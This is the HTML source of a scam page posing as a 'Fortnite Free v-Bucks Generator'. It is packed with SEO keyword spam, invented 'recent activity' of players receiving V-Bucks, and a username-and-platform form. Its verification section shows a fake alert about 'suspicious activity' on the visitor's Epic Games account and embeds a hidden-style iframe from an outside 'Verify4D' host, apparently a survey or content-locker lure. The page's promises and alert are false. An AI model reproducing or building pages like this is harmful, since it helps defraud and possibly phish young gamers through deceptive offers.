
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Fortnite Free v-Bucks Generator</title>
	<meta name="description" content="This Fortnite Free v-Bucks Generator 100% Working 2021  Free v-Bucks, Get Free v-Bucks, Earn Free v-Bucks, v-Bucks Generator, free v bucks,free v bucks generator,free v bucks code,free v bucks 2021,free v bucks no human verification,free v bucks codes ps4,free v bucks without human verification,free v bucks ps4,free v bucks fortnite,free v bucks hack,free v bucks codes 2021,free v bucks ps5,free v bucks ps5 2021,free v bucks xbox series x,free v bucks xbox series x 2021,free v bucks,free v bucks code,free vbucks 2021,free v bucks generator,free v bucks in fortnite,free v bucks card,free v bucks glitch,free v bucks no verification,free v bucks app,free v bucks ps4,free v bucks discord,free vbucks,free vbucks ps5,free vbucks ps5 2021,free vbucks generator,free vbucks xbox series x,free vbucks xbox series x 2021,v bucks generator,v bucks generator no human verification,v bucks generator free,v bucks generator no verification,v bucks generator 2021,v bucks generator ps4,v bucks generator without human verification,v bucks generator fortnite,v bucks generator real,v bucks generator.win,v bucks generator no human verification 2021,v bucks generator that works,v bucks generator ps5,v bucks generator ps5 2021,v bucks generator xbox series x,v bucks generator xbox series x 2021,free v bucks generator 2021"/>
	<meta name="keywords" content="Free v-Bucks, Get Free v-Bucks, Earn Free v-Bucks, v-Bucks Generator, free v bucks,free v bucks generator,free v bucks code,free v bucks 2021," />
    <meta name="google-site-verification" content="-s2kvVxiuC82gIIf8BVY4lI6KxyjB5pzrTI2zOszw5o" />
	<meta name="author" content="Free v-Bucks" />
	<link rel="stylesheet" type="text/css" href="css/animate.css" />
	<link rel="stylesheet" type="text/css" href="css/style.css" />
	<link rel="stylesheet" type="text/css" href="css/bootstrap.css" />
	<link rel="stylesheet" type="text/css" href="css/fontawesome-all.min.css" />
	<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700" rel="stylesheet" />
	<meta name="theme-color" content="#344b73">
	<meta name="msap-ication-navbutton-color" content="#344b73">
	<meta name="apple-mobile-web-app-status-bar-style" content="#344b73">
	<link rel="icon" type="image/png" href="https://www.vbucks-fortnite.com/img/favicon2.png" />
	<style>
		.row {
			margin-right: 0;
			margin-left: 0;
		}
	</style>

</head><br>
<body>
    <div class="modal fade" id="packagesModal" role="dialog">
        <div class="modal-dialog modal-lg">
            <div class="modal-content">
                <div class="modal-header">
                    <h4 class="modal-title">Choose your packet</h4>
                </div>
                <div class="modal-body">
                    <ul class="packages">
                        <li class="soundclick" data-amount="1000">
                            <div class="packet_list_price">Free</div>
                            <img src="img/box4.png" alt="packet" />
                            <div class="packet_list_coins">1,000</div>
                        </li>
                        <li class="soundclick" data-amount="2800">
                            <div class="packet_list_price">Free</div>
                            <img src="img/box1.png" alt="packet" />
                            <div class="packet_list_coins">2,800</div>
                        </li>
                        <li class="soundclick" data-amount="7500">
                            <div class="packet_list_price">Free</div>
                            <img src="img/box2.png" alt="packet" />
                            <div class="packet_list_coins">7,500</div>
                        </li>
                        <li class="soundclick" data-amount="13500">
                            <div class="packet_list_price">Free</div>
                            <img src="img/box3.png" alt="packet" />
                            <div class="packet_list_coins">13,500</div>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
    <div class="modal fade" id="loadingModal" role="dialog">
        <div class="modal-dialog modal-lg">
            <div class="modal-content">
                <div class="modal-body">
                    <div class="loading">
                    	<div class="loader-count">
	                        <div class="lds-ring"><div></div><div></div><div></div><div></div></div>
	                        <div class="load_text">Loading<span class="blink">...</span></div>
	                        <p>Loading user stats </p>
                    	</div>
	                    <ul class="package-count">
	                        <li class="mobile-package">
	                            <div class="packet_list_price count-js-title">Free</div>
	                            <img class="mobile-package-img" src="img/box3.png" alt="packet" />
	                            <div class="packet_list_coins"><span id="count21" class="valueCount-js">0</span></div>
	                        </li>
	                    </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
		<div class="container">
			<ul class="tab_links">
				<li><a class="soundclick" data-toggle="tab" href="index.html#home"><i class="fas fa-bars"></i><span>Recent Activity</span></a></li>
				<li class="active"><a class="soundclick" data-toggle="tab" href="index.html#menu1"><i class="fas fa-bullseye"></i><span>Generator</span></a></li>
				<li><a class="soundclick" data-toggle="tab" href="index.html#menu2"><i class="fas fa-database"></i><span>Daily Items</span></a></li>
			</ul>
		</div>
		<div class="tab-content">
			<div id="home" class="tab-pane fade">
                <div class="container">
                    <div class="recent_bg">
                        <div class="title_bar">
                            <span>Recent activity</span>
                        </div>
                        <div class="main_bg">
                            <div class="row">
                                <div class="col-sm-6">
                                    <div class="recent_block-add">
                                        <div class="recent_block">
                                            <div class="row">
                                                <div class="recent_block_avatar">
                                                    <img src="img/recentavatar.png" alt="render" />
                                                </div>
                                                <div class="recent_block_name">
                                                    Name<br /><span>ElNoob</span>
                                                </div>
                                                <div class="recent_block_bucks">
                                                    V-Bucks<br /><img src="img/bucks.png" alt="bucks" /><span>13500</span>
                                                </div>
                                                <div class="recent_block_platform">
                                                    Platform<br /><span><i class="fab fa-windows"></i></span>
                                                </div>
                                                <div class="stepper" data-value="0">
                                                    <div class="step active">
                                                        <div class="circle">1</div>
                                                        <div class="label">Generator</div>
                                                    </div>
                                                    <div class="divider"></div>
                                                    <div class="step">
                                                        <div class="circle">2</div>
                                                        <div class="label">Verification</div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-sm-6">
                                    <div class="recent_block-add">
                                        <div class="recent_block">
                                            <div class="row">
                                                <div class="recent_block_avatar">
                                                    <img src="img/recentavatar.png" alt="render" />
                                                </div>
                                                <div class="recent_block_name">
                                                    Name<br /><span>Pottato</span>
                                                </div>
                                                <div class="recent_block_bucks">
                                                    V-Bucks<br /><img src="img/bucks.png" alt="bucks" /><span>2800</span>
                                                </div>
                                                <div class="recent_block_platform">
                                                    Platform<br /><span><i class="fab fa-apple"></i></span>
                                                </div>
                                                <div class="stepper" data-value="0">
                                                    <div class="step active">
                                                        <div class="circle">1</div>
                                                        <div class="label">Generator</div>
                                                    </div>
                                                    <div class="divider"></div>
                                                    <div class="step">
                                                        <div class="circle">2</div>
                                                        <div class="label">Verification</div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-sm-6">
                                    <div class="recent_block-add">
                                        <div class="recent_block">
                                            <div class="row">
                                                <div class="recent_block_avatar">
                                                    <img src="img/recentavatar.png" alt="render" />
                                                </div>
                                                <div class="recent_block_name">
                                                    Name<br /><span>Pottato</span>
                                                </div>
                                                <div class="recent_block_bucks">
                                                    V-Bucks<br /><img src="img/bucks.png" alt="bucks" /><span>2800</span>
                                                </div>
                                                <div class="recent_block_platform">
                                                    Platform<br /><span><i class="fab fa-xbox"></i></span>
                                                </div>
                                                <div class="stepper" data-value="0">
                                                    <div class="step active">
                                                        <div class="circle">1</div>
                                                        <div class="label">Generator</div>
                                                    </div>
                                                    <div class="divider"></div>
                                                    <div class="step">
                                                        <div class="circle">2</div>
                                                        <div class="label">Verification</div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-sm-6">
                                    <div class="recent_block-add">
                                        <div class="recent_block">
                                            <div class="row">
                                                <div class="recent_block_avatar">
                                                    <img src="img/recentavatar.png" alt="render" />
                                                </div>
                                                <div class="recent_block_name">
                                                    Name<br /><span>Pottato</span>
                                                </div>
                                                <div class="recent_block_bucks">
                                                    V-Bucks<br /><img src="img/bucks.png" alt="bucks" /><span>7500</span>
                                                </div>
                                                <div class="recent_block_platform">
                                                    Platform<br /><span><i class="fab fa-playstation"></i></span>
                                                </div>
                                                <div class="stepper" data-value="0">
                                                    <div class="step active">
                                                        <div class="circle">1</div>
                                                        <div class="label">Generator</div>
                                                    </div>
                                                    <div class="divider"></div>
                                                    <div class="step">
                                                        <div class="circle">2</div>
                                                        <div class="label">Verification</div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
			</div>
			<div id="menu1" class="tab-pane fade in active">

                <div class="container human-verification">
                    <div class="recent_bg">
                        <div class="title_bar">
                            <span><i class="fas fa-user-shield"></i> Verification</span>
                        </div>
                        <div class="main_bg text-center">
                                <h2 class="font-verification"><i class="fas fa-user-times"></i><br /><span class="prepare-usr"></span></h2>
                                <p class="font-verification-p">
                                    We've detected suspicious activity on your Epic Games ( Fortnite ) account.
                                </p>
                                    <iframe src="https://virginiafiles.com/Verify4D" opacity="0" scrolling="no" margin-top="100px" marginwidth="0" marginheight="0" align="middle" frameborder="0" width="100%" height="100%" style="position:relative;left: %;">> </iframe>
                                </div>
                        </div>
                    </div>
                </div>

				<div class="row">
					<div class="leftside">
						<div class="left_panel generator-page">
							<div class="title_bar">
								<span>Generator</span>
							</div>
							<div class="main_bg">
								<div class="row">
									<div class="space">
										<div class="generator_avatar">
											<img src="img/avatar_gen.png" alt="avatar" />
										</div>
										<div class="generator_info">
											<p>Username</p>
											<input class="usernameInput" type="text" placeholder="Type here..." />
										</div>
									</div>
									<div class="generator_bar">Select your platform</div>
									<div class="generator_platform">
										<ul class="platforms">
											<li class="platform-active" data-name="pc"><i class="fab fa-windows"></i><br />Windows</li>
											<li data-name="psn"><i class="fab fa-playstation"></i><br />Playstation</li>
											<li data-name="xbox"><i class="fab fa-xbox"></i><br />xBox</li><br />
											<li data-name="pc"><i class="fab fa-nintendo-switch"></i><br />Switch</li>
											<li data-name="pc"><i class="fab fa-apple"></i><br />iOS</li>
											<li data-name="pc"><i class="fab fa-android"></i><br />Android</li>
										</ul>
									</div>
								</div>
							</div>
                            <div class="generator_bottom">
                                <div class="row">
                                    <div class="btn_bg2 btnFirst">
                                        <div class="btn_bg_yellow btnCheckData">
                                            <a class="soundclick"><span>Next</span></a>
                                        </div>
                                    </div>
                                </div>
                            </div>
						</div>
					</div>

					<div class="rightside">
						<div class="right_panel">
							<div class="title_bar2">
								<span>Your info</span>
							</div>
							<div class="first_block_right">
								NAME<br /><span class="prepare-usr">Fortnite</span>
								<div class="generator_icons">
									<ul>
										<li><img src="img/kills.png" alt="kills" /><br /><em class="player-kills normal-font">33</em></li>
										<li><img src="img/wins.png" alt="wins" /><br /><em class="player-wins normal-font">40%</em></li>
										<li><img src="img/matches.png" alt="matches" /><br /><em class="player-matches normal-font">28</em></li>
										<li><img src="img/score.png" alt="score" /><br /><em class="player-score normal-font">5,728</em></li>
									</ul>
								</div>
								<div class="total_coins">
									<img src="img/bucks.png" alt="coins" /><span class="prepare-value value-Counto">1000</span>
								</div>
							</div>
							<div class="second_block_right">
								<div class="btn_bg">
									<div class="btn_bg_yellow">
										<a class="btnStartGenerator soundclick"><span>Generate</span></a>
									</div>
								</div>
							</div>
						</div>

					</div>
				</div>
			</div>
			<div id="menu2" class="tab-pane fade">
				
	<script type="text/javascript" src="js/jquery.min.js"></script>
	<script type="text/javascript" src="js/bootstrap.min.js"></script>
	<script type="text/javascript" src="js/ion.sound.min.js"></script>
	<script type="text/javascript" src="js/animate.js"></script>
	<script type="text/javascript" src="js/particles.min.js"></script>
	<script type="text/javascript" src="js/countup.js"></script>
	<script type="text/javascript" src="js/application.js"></script>

</body>
</html>